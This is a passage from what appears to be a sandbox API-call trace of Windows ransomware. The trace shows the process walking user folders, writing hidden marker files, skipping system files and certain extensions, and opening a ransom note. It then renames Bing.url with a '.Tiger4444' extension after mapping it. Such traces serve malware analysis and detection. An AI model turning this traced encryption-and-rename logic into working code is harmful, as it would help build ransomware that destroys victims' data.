0xbe0000 [0046.180] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.180] CloseHandle (hObject=0x260) returned 1 [0046.180] CloseHandle (hObject=0x2ac) returned 1 [0046.181] GetCurrentThreadId () returned 0xfa8 [0046.181] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66348 [0046.181] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Links", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0046.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc678a8 | out: hHeap=0xc50000) returned 1 [0046.181] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66340 | out: hHeap=0xc50000) returned 1 [0046.181] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Links" | out: lpString1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0046.181] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Links", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0046.181] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Links\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3" [0046.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\links\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.183] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.185] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.186] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.187] CloseHandle (hObject=0x2ac) returned 1 [0046.187] lstrlenW (lpString="C:\\Users\\FD1HVy\\Links") returned 21 [0046.187] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.187] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x808a8db2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0046.187] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.187] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.187] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.187] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.187] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x808a8db2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.188] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.188] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.188] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.188] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x808a8db2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x808a8db2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x808cef94, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.188] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.188] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.188] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcee4480b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0046.188] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0046.188] lstrcpyW (in: lpString1=0x30aead4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0046.188] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\desktop.ini", dwFileAttributes=0x2) returned 1 [0046.188] lstrlenW (lpString="desktop.ini") returned 11 [0046.188] lstrlenW (lpString="Tiger4444") returned 9 [0046.188] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0046.188] lstrlenW (lpString=".dll") returned 4 [0046.189] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0046.189] lstrlenW (lpString=".lnk") returned 4 [0046.189] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0046.189] lstrlenW (lpString=".ini") returned 4 [0046.189] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0046.189] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce90d59d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Tiger4444.exe") returned -1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="windows") returned -1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="bootmgr") returned 1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="pagefile.sys") returned -1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="boot") returned 1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ids.txt") returned -1 [0046.189] lstrcmpiW (lpString1="Desktop.lnk", lpString2="NTUSER.DAT") returned -1 [0046.189] lstrcpyW (in: lpString1=0x30aead4, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0046.189] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", dwFileAttributes=0x0) returned 1 [0046.189] lstrlenW (lpString="Desktop.lnk") returned 11 [0046.189] lstrlenW (lpString="Tiger4444") returned 9 [0046.189] lstrcmpiW (lpString1="sktop.lnk", lpString2="Tiger4444") returned -1 [0046.189] lstrlenW (lpString=".dll") returned 4 [0046.189] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0046.189] lstrlenW (lpString=".lnk") returned 4 [0046.189] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0046.189] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcec7abde, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0046.189] lstrcmpiW (lpString1="Downloads.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.189] lstrcmpiW (lpString1="Downloads.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.189] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Tiger4444.exe") returned -1 [0046.189] lstrcmpiW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="windows") returned -1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="bootmgr") returned 1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="pagefile.sys") returned -1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="boot") returned 1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ids.txt") returned -1 [0046.190] lstrcmpiW (lpString1="Downloads.lnk", lpString2="NTUSER.DAT") returned -1 [0046.190] lstrcpyW (in: lpString1=0x30aead4, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0046.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", dwFileAttributes=0x0) returned 1 [0046.190] lstrlenW (lpString="Downloads.lnk") returned 13 [0046.190] lstrlenW (lpString="Tiger4444") returned 9 [0046.190] lstrcmpiW (lpString1="loads.lnk", lpString2="Tiger4444") returned -1 [0046.190] lstrlenW (lpString=".dll") returned 4 [0046.190] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0046.190] lstrlenW (lpString=".lnk") returned 4 [0046.190] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0046.190] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="Tiger4444.exe") returned -1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2=".") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="..") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="windows") returned -1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="bootmgr") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="pagefile.sys") returned -1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="boot") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="ids.txt") returned 1 [0046.190] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="NTUSER.DAT") returned 1 [0046.190] lstrcpyW (in: lpString1=0x30aead4, lpString2="OneDrive.lnk" | out: lpString1="OneDrive.lnk") returned="OneDrive.lnk" [0046.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", dwFileAttributes=0x0) returned 1 [0046.192] lstrlenW (lpString="OneDrive.lnk") returned 12 [0046.192] lstrlenW (lpString="Tiger4444") returned 9 [0046.192] lstrcmpiW (lpString1="Drive.lnk", lpString2="Tiger4444") returned -1 [0046.192] lstrlenW (lpString=".dll") returned 4 [0046.192] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0046.192] lstrlenW (lpString=".lnk") returned 4 [0046.192] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0046.192] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 0 [0046.192] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0046.192] lstrcpyW (in: lpString1=0x30aead4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.192] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\links\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.193] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.193] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.193] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.193] CloseHandle (hObject=0x260) returned 1 [0046.193] CloseHandle (hObject=0x2ac) returned 1 [0046.194] GetCurrentThreadId () returned 0xfa8 [0046.194] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0046.194] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Favorites", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0046.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72e88 | out: hHeap=0xc50000) returned 1 [0046.194] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0046.194] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Favorites" | out: lpString1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0046.194] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0046.194] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3" [0046.194] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\favorites\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.196] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.198] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.199] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.200] CloseHandle (hObject=0x2ac) returned 1 [0046.200] lstrlenW (lpString="C:\\Users\\FD1HVy\\Favorites") returned 25 [0046.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.200] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x808cef94, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0046.200] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.200] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.200] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.200] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.200] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x808cef94, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.201] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.201] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.201] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.201] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.201] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x808cef94, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x808cef94, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x808f5210, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.201] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.201] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.201] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="Tiger4444.exe") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2=".") returned 1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="..") returned 1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="windows") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="bootmgr") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="pagefile.sys") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="boot") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="ids.txt") returned -1 [0046.201] lstrcmpiW (lpString1="Bing.url", lpString2="NTUSER.DAT") returned -1 [0046.201] lstrcpyW (in: lpString1=0x30aeadc, lpString2="Bing.url" | out: lpString1="Bing.url") returned="Bing.url" [0046.201] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url", dwFileAttributes=0x0) returned 1 [0046.203] lstrlenW (lpString="Bing.url") returned 8 [0046.203] lstrlenW (lpString="Tiger4444") returned 9 [0046.203] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0046.203] lstrlenW (lpString=".dll") returned 4 [0046.203] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0046.203] lstrlenW (lpString=".lnk") returned 4 [0046.203] lstrcmpiW (lpString1=".url", lpString2=".lnk") returned 1 [0046.203] lstrlenW (lpString=".ini") returned 4 [0046.203] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0046.203] lstrlenW (lpString=".sys") returned 4 [0046.203] lstrcmpiW (lpString1=".url", lpString2=".sys") returned 1 [0046.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.203] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.203] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13765656575) returned 1 [0046.203] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=208) returned 1 [0046.204] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0046.204] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0046.204] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d0, lpName=0x0) returned 0x2c8 [0046.205] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d0) returned 0xbe0000 [0046.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0046.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0046.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.208] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13766124097) returned 1 [0046.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0046.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0046.208] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.208] CloseHandle (hObject=0x2c8) returned 1 [0046.208] CloseHandle (hObject=0x260) returned 1 [0046.210] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Favorites\\Bing.url.Tiger4444") returned 44 [0046.210] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), lpNewFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url.Tiger4444" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url.tiger4444"), dwFlags=0x1) returned 1 [0046.210] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=208 | out: Addend=0xc6f980) returned 20602592 [0046.210] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4609 [0046.210] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.210] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 